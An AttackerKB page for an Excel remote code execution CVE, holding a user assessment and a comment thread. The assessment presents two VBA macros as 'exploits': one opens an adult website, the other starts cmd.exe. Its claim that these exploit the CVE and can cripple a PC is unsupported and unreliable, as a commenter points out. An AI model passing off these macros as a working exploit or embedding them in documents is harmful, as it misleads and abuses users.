High
CVE-2023-23399
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2023-23399
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Microsoft Excel Remote Code Execution Vulnerability
Add Assessment
Ratings
-
Attacker ValueHigh
-
ExploitabilityMedium
Technical Analysis
CVE-2023-23399
Description:
The malicious user can exploit the victim’s PC remotely.
For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.
In this case, the malicious excel file create a very dangerous shell execution file, and after the victim will execute it, his PC maybe will never wake up normally, it depends on the case, which is very nasty.
STATUS: HIGH Vulnerability
[+]Exploit0:
Sub Check_your_salaries() CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://pornhub.com/" End Sub
[+]Exploit1:
Sub cmd() Dim Program As String Dim TaskID As Double On Error Resume Next Program = "cmd.exe" TaskID = Shell(Program, 1) If Err <> 0 Then MsgBox "Can't start " & Program End If End Sub
Reproduce:
Proof and Exploit:
Proof and Exploit, danger example:
Time spend:
03:00:00
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- microsoft
Products
- 365 apps -,
- excel 2013,
- excel 2016,
- office 2013,
- office 2016,
- office 2019,
- office long term servicing channel 2021,
- office online server -,
- office web apps server 2013
References
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Is there more information about what exactly the vulnerable component in Excel is? I can’t find much information about this but I can’t image it is simply the shell function in VBA, that’s been a vector for some time. Any additional info would be appreciated. Thanks for sharing!
(but I can’t image it is simply the shell function in VBA, that’s been a vector for some time. Any additional info would be appreciated.)
Yes, my dear friend and it has been for a long time. If you remember, a long time ago Microsoft allowed VBA execution from Internet Explorer, which is the same STUPID decision, etc…
BR =)